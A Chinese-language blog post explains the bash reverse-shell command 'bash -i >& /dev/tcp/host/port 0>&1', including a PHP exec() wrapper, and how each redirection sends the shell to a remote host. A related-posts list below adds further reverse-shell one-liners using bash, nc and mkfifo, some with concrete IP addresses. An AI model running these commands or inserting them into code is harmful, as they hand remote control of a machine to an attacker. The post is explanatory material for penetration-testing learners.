反弹bash shell解释

已于 2023-09-28 15:21:55 修改
阅读量670 收藏 1
点赞数 1
文章标签: bash linux 开发语言 网络安全
于 2023-03-15 15:21:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43750882/article/details/129555886
版权 
参考:
https://stackoverflow.com/questions/818255/what-does-21-mean/818265#818265

你是否使用过类似代码:

<?php exec("/bin/bash -c 'bash -i >&  /dev/tcp/xxx.xxx.xxx.xxx/port 0>&1' ") ?>

其中

/bin/bash -c 'bash -i >&  /dev/tcp/xxx.xxx.xxx.xxx/port 0>&1'

是一段用来反弹bash到目标ip的命令。意为使用bash打开新的bash,把标准输出重定向到远程主机,标准输入重定向到标准输出。实现远程主机输入命令,在本机执行,执行结果发送给远程主机。
由于反弹shell代码可能会被PHP等通过Bourne Shell (sh)执行,而不是被bash执行,而sh不支持我们的反弹shell的某些语法。为了确保反向shell通过Bash执行,我们需要修改反向shell命令。即通过提供bash -c 的参数来实现。

/bin/bash -c ""

即使用bash执行引号里的命令。

bash -i

意为打开可交互的bash。

/bin/bash -c 'bash .........'

相当于在命令行窗口直接输入bash并回车运行,在bash中执行了“打开bash”的操作。

>&

大于号是重定向符号,意为对标准输出进行重定向,重定向到&符号后面所给出的目标。&符号用来表明后面跟的是文件描述符(file descriptor)。>1>&1是有区别的,分别代表“重定向到文件名为1的文件中,若不存在该文件则进行创建,若存在该文件则对内容进行覆盖”和“重定向到标准输出”,使用&进行区分。&跟在>后的时候,被解释为重定向到文件描述符所指的目标。

/dev/tcp/xxx.xxx.xxx.xxx/port

是伪设备,代表远程主机。

>&  /dev/tcp/xxx.xxx.xxx.xxx/port

表示把标准输出重定向到远程主机。

0>&1

表示把标准输入重定向到标准输出。

/bin/bash -c 'bash -i >&  /dev/tcp/xxx.xxx.xxx.xxx/port 0>&1'

有两个重定向命令,>& /dev/tcp/xxx.xxx.xxx.xxx/port执行过后,标准输出已经重定向到远程主机,再执行0>&1,把标准输入重定向到标准输出,执行后,标准输入和标准输出都重定向到了远程主机。

注意,下列命令作用不同:(把0>&1放到>& /dev/tcp/xxx.xxx.xxx.xxx/port前面)

/bin/bash -c 'bash -i  0>&1 >& /dev/tcp/xxx.xxx.xxx.xxx/port'

这条命令先把标准输入重定向到标准输出,再把标准输出重定向到远程主机,执行后,标准输出的确定向到了远程主机,但标准输入未发生改变。

注:

文件描述符:
0 标准输入
1 标准输出
2 标准错误

在这里插入图片描述

ccOCONuTT
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 472
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1096
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
linux反弹shell方法
weixin_53747497的博客
07-12 1801
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
Linux反弹Shell
最新发布
m0_73199983的博客
03-06 1064
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
PHP代码实现反弹shell
E1even的博客
08-28 3642
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
浅析Linuxbash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc...[ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
我个人认为太笼统了,比如bash-i, nc -e /bin/bash, pty , socat都是交互式反弹shell,但是他们本身有很大的不同。单拿bash -i和nc -e /bin/bash来说,都是弹bash,为啥- -个加-i,- -个不加,他们有什么不同,统称...
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
php 端口反弹,详解反弹shell命令
weixin_33988332的博客
03-13 655
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势:bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地以交互模式打开一个bash>& 输出重定向,将标准输出和标准错误输出都重定向到远程。/dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机器。0&...
各种shell反弹方法
weixin_46626737的博客
05-16 1985
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
各种反弹shell方式
m0_58606546的博客
11-17 2269
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
php反弹shell脚本
a1_pha的博客
01-24 613
用msfvenom也可以生成反弹shell脚本,但有时候用不了。
反弹shell的命令大全
G3et的博客
03-21 825
【代码】反弹shell的命令大全。
实战攻击-php反弹shell
网络安全领域优质创作者
11-05 2832
以下均为实际攻击过程,记录笔记,仅供学习参考 whatweb10.11.1.8:80cms识别 dirbhttp://10.11.1.8/ 目录扫描 dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描 Python3 dirsearch.py -uurl-e php扫描目录 得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5796
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
Linux反弹Shell总结
qq_45600801的博客
01-06 4224
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
php命令执行反弹nc,详解NC反弹shell的几种方法
weixin_32187037的博客
04-04 1655
假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s...
bash反弹shell
03-16
Bash反弹shell是指利用Bash命令解释器执行特定的命令,从而在远程主机上实现一个反向shell,以便攻击者可以在远程主机上执行命令并控制该主机。 具体来说,攻击者可以在本地主机上启动一个监听程序,并在远程主机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值